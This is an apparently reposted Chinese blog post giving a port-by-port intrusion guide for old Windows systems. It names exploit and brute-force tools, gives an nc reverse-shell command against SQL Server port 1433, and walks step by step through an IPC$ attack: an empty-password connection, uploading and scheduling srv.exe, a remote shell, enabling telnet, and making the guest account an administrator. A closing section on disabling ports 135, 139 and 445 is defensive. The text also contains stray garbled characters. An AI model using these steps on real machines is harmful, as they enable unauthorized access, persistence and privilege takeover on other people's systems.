各个端口入侵详解

各个端口入侵详解 1.135端口入侵  可以用NT扫描器来扫描所要IP端  扫出来用Recton2.5来开3389或TELNET服务等等  2.139端口入侵着个端口主要是扫的弱口令,用扫端口的扫一段IP的139端口在用X-SCAN来批量扫描查弱口令3.1433端口入侵  scanport.exe查有1433的机器  SQLScanPas*.**e进行字典

 

1.135端口入侵  

可以用NT扫描器来扫描所要IP端   

扫出来用Recton2.5来开 3389或TELNET服务等等  

2.139端口入侵

着个端口主要是扫的弱口令,用扫端口的扫一段IP的139端口

在用X-SCAN来批量扫描查弱口令

3. 1433端口入侵   

scanport.exe 查有1433的机器   

SQLScanPas*.**e 进行字典暴破(字典是关键)

最后 SQLTool*.**e入侵  

对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口  

(以上反向的,测试成功)

sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

4. 4899端口入侵  

用4899过滤器.exe,扫描空口令的机器  

5. 3899的入侵  

对很早的机器,可以试试3389的溢出(win3389ex.exe)  

对2000的机器,可以试试字典暴破。(tscrack.exe)   

6. 80入侵  

对sp3以前的机器,可以用webdav入侵;

对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)  

可以利用SQL进行注入。(啊D的注入软件)。   

7. serv-u入侵(21端口)

对5. 004及以下系统,可用溢出入侵。(serv5004.exe)   

对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)   

对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)  

输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码  

8. 554端口  

用real554.exe入侵。

J/’oW]6K!   

9. 6129端口   

用DameWare6129.exe入侵。

10. 系统漏洞   

利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,  

进行溢出入侵。  

  

11. 3127等端口

可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

12. 其他入侵   

利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。  

经典IPC$入侵

1. C:/>net use //127.0.0.1/IPC$ “” /user:”admintitrators”  

这是用”流光”扫到的用户名是administrators,密码为”空”的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为”空”,所以第一个引号处就不用输入,后面一个双引号里的是用户名  

,输入administrators,命令即可成功完成。   

2. C:/>copy srv.exe //127.0.0.1/admin$  

先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的  

c:/winnt/system32/,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去

3. C:/>net time //127.0.0.1  

查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

     

4. C:/>at //127.0.0.1 11:05 srv.exe  

用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.    ;*!

5. C:/>net time //127.0.0.1   

再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备   

开始下面的命令。   

  6. C:/>telnet 127.0.0.1 99  

这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的  

是SRV在对方计算机中为我们建立一个99端口的Shell。   

虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打 算建立一个Telnet服务!这就要用到ntlm了   

    

7.C:/>copy ntlm.exe //127.0.0.1/admin$  

用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。     

8. C:/WINNT/system32>ntlm   

输入ntlm启动(这里的C:/WINNT/system32>指的是对方计算机,运行ntlm其实是让这  

个程序在对方计算机上运行)。当出现”DONE”的时候,就说明已经启动正常。然后使 用”net start telnet”来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作  

一样简单!(然后你想做什么?想做什么就做什么吧,哈哈) !  

为了以防万一,我们再把guest激活加到管理组   

10. C:/>net user guest /active:yes  

将对方的Guest用户激活

11. C:/>net user guest 1234   

将Guest的密码改为1234,或者你要设定的密码

12. C:/>net locaLGroup administrators guest /add  

将Guest变为Administrator

 

 

这次说的是关闭高危端口!
主要还是针对于前一段时间的抓及热的几个端口!
对我们个人的计算机产生危险的!也就是135,139,445
首先看139端口!
直接禁用这个netbios就可以了!
如果你是宽带上网的话!
直接禁用猫的!
如果你是局域网的!
直接禁用网卡的!也就是本地连接的!
之后会提示重新启动!
重启一下就ok了!
下边是445这个有很多的方法!
我就来个最实用的方法!
因为这个端口也是最危险的!
微软就是会赚钱!给操作系统留下这么个隐患!
首先我们打开注册表!
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/NetBT/Parameters
依次找到这个项目!
在这里!
新建DWORD项的名字叫这个SMBDeviceEnabled
值为0就可以了!
最后就是135,这个有些麻烦了!
没关系我们依旧可以关闭他!
首先打开防火墙!
我们启用防火墙!
因为这个防火墙默认是禁用所有的!
所以我们135也是被禁用的!但是很多访问网络的程序就没办法访问了亚!
呵呵!
没关系!~只要我们在列外里边把他添加进去就可以了!
如果你的电脑防火墙里如果有WMI这个项目的话
就在这里!一定要把他删除或者把前边的勾去掉!
而且防火墙没事情的时候要启用他!
WMI就是使用的135端口
如果有文件和打印机!
我建议你再把他取消!
因为这个是445的,为了安全吗!
毕竟这些是不能保证百分之百的安全!
没有做不到,只有想不到!

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/37931.html

(0)
编程小号编程小号

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注